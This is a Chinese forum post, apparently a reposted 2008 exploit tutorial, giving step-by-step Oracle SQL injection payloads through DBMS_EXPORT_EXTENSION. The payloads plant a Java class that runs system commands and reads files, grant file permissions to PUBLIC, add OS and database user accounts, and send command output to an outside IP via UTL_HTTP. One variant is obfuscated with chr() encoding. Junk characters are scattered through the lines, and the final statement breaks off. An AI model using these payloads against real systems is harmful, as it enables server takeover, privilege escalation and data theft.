以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 # G2 V0 z8 u; |( z
9 V- K. L! G/ [ /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) 1 ?) `, L4 x/ M$ _) D' q
的形式即可。(用" 'a'|| "是为了让语句返回true值) ! v, G/ z* u T' T. b0 ]3 b
语句有点长,可能要用post提交。
) p S4 G; O' w; g0 G* t. Z以下是各个步骤: + ?# p: u8 A* f! I$ t9 @
1.创建包 + U- r, E( Z `
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件: h$ G* u% ?/ {0 l! z
/xxx.jsp?id=1 and '1'<>'a'||( 1 ^* u8 w0 J& }) Y3 X
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''9 t" |) G5 N) D# j
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(- @+ ^7 }- n4 C2 K' v9 O- t
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}# j# h9 W) Z" f$ A9 s
}'''';END;'';END;--','SYS',0,'1',0) from dual
: n; t1 f, a) f3 ?; M& b- \0 Y)
- G/ Y! V2 e& b+ o- h------------------------
( l' o, b$ m1 O, C6 p: x如果url有长度限制,可以把readFile()函数块去掉,即:
# d1 U+ ]8 P- \+ j% ^$ S4 ?1 Z/xxx.jsp?id=1 and '1'<>'a'||( & }5 s- U M: c% X
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''$ R( Y3 I; x7 t; K' l b
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
8 ^" ?0 F. [( j2 S" M) dnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}/ L6 ~+ M- A# M
}'''';END;'';END;--','SYS',0,'1',0) from dual
* g3 j+ [8 t+ q" L/ P)
. f+ g, n9 r+ }6 Y3 K( u同时把后面步骤 提到的 对readFile()的处理语句去掉。
" h* l8 W2 C2 I t1 K------------------------------ 1 v n9 m& B' c) _
2.赋Java权限
# L- ~) b7 J' l7 fselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual, `$ ?& b& a9 F
3.创建函数
. ]" Y0 M0 \0 k. l# N/ K8 e/ ~4 Rselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''! N5 `7 L6 E. |* N; }, D1 E# t
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual, q3 Z3 D) g' R9 {3 |: G
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
4 c. ~6 o& k. e, Screate or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
4 X/ c9 N5 ~1 v# i; a4.赋public执行函数的权限 ) {& W t7 ~0 e$ H% y
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual V4 o5 p0 C2 x B$ s, F
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual8 T4 {0 h; T! D! I% h2 e1 E
5.测试上面的几步是否成功
8 X6 R1 M6 w% q5 D# _' \( e- sand '1'<>'11'||(
, L% p- y3 [" e: P/ R' pselect OBJECT_ID from all_objects where object_name ='LINXRUNCMD'
2 E- p7 |' e+ i- b7 Q( H9 \)
. ]1 Y3 r9 u3 a. k! Zand '1'<>(
/ E2 q) o/ ~: g" f4 \0 O1 t" Nselect OBJECT_ID from all_objects where object_name ='LINXREADFILE'
# c, w7 y) Y1 _0 E V' }2 N)
$ F+ ^$ h3 I1 A; }! t$ M: E+ `6.执行命令: 8 u/ e Y2 ^$ X% @9 [
/xxx.jsp?id=1 and '1'<>(
* }7 f! ^1 ?2 N! ~select sys.LinxRunCMD('cmd /c net user linx /add') from dual
3 n" d+ X! b) c1 q0 H
+ v! Y8 q, P- J)
' m3 C3 I7 x. R( W* q/xxx.jsp?id=1 and '1'<>(
' }/ a3 x7 O+ wselect sys.LinxReadFile('c:/boot.ini') from dual8 m# w- S; `. _ p+ h& b, r# p
% [5 u, g* e! l* k0 W0 G)& }9 A5 k1 K2 `3 } ^
& f( }* l/ E6 p$ I$ E$ k注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 8 O6 n2 N& t. G# _+ P
如果要查看运行结果可以用 union : 4 x- [) j6 [7 H1 j! Y
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual
5 O5 w( [( Y2 j% n) l5 b3 R9 e6 _或者UTL_HTTP.request(:
. }$ L) Y/ v( N. n* C$ O/xxx.jsp?id=1 and '1'<>( $ O' ^! b, {1 W6 Q( F
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
: O8 A! ]( S: `. E)
: ~# q. R- V+ @4 m1 U0 N: I" @/xxx.jsp?id=1 and '1'<>(
& Q: G3 L) ]5 [ M; SSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
7 @1 J) B/ |, o% S7 p. e6 U) & O% l( L' Q( t, H8 e( Y, d
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
6 A/ Q1 H1 h3 M- S: ?: |-------------------- 0 \) _ X% ?- S# v' e7 R
6.内部变化
" Q6 X L) @# |0 D# ^9 n* O通过以下命令可以查看all_objects表达改变:
7 Z1 I/ |. u6 a% S2 y8 @9 R- nselect * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'
$ ?+ d# P& m- Z) }$ d7.删除我们创建的函数 - S+ v; p1 x4 E
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 x o( p7 l& o$ x& P& I I3 Edrop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual 7 j. T1 S, b2 D3 @7 X
====================================================
$ Z! E" F' U3 H5 a+ f全文结束。谨以此文赠与我的朋友。 6 W- k8 m5 h7 U ~
linx
9 M- p/ T8 c: g* ]( S124829445 9 O; V s; |! `/ w* W. |, P. o
2008.1.12
/ ^3 @& H4 o) g! J V9 Flinyujian@bjfu.edu.cn / x% p: J+ }8 ^: [- m
======================================================================
5 ]( M1 E( S5 i4 K测试漏洞的另一方法: . o8 {+ ^7 I% [) J, ?8 _5 ?
创建oracle帐号: * F, I- E4 C7 E" Y4 g4 ?
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 p/ H& u9 r/ t9 F' ICREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
( E0 z y0 q+ [. G& `/ q即: 3 Z/ J: V3 x, z$ A+ f
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),( {9 \) T4 }9 @$ v8 y& `
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
6 E: r) ^5 t5 _6 w& z确定漏洞存在: " W5 e! @) {; R# \* u
1<>(
8 Y4 o: Z; Y7 t9 \# h9 }: ]select user_id from all_users where username='LINXSQL'
5 m! ~3 b( P7 O- }5 J4 V0 M)
' H4 M9 L1 h7 U3 A& o# H/ q给linxsql连接权限: " m% f; n" d2 @: a
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''' i9 E0 \' z+ l M
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
1 L: P" p) q( H% ~3 f删除帐号:
( C7 D# ?4 u3 ^0 S& ~select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''; w! @0 b u; C# A. T
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual # L9 _: X* N0 N4 E# _
====================== 6 c1 N6 w$ K$ K* U) G$ f
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
- [ f9 o4 }+ d) d( V- Q1.jsp?id=1 and '1'<>( 8 n9 v5 K }( J
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
. i: g, ]$ R) O5 T# x, a- @( ], _create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual, C: e4 S) o0 G4 c! u5 d4 Q' F
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
! T' D, d; b8 y5 f. s4 k/ g' l )
3 u" Y1 K0 i! m! g/ s" ]2 u7 m* ?8 b0 c- |6 u
" b ]& F% f0 g* U6 H" Y' |/ {; h
7 f) r, A% Z; g" O, [8 K6 I. l0 C5 T
|
发表于 2012-12-18 12:21:48
收藏
支持
反对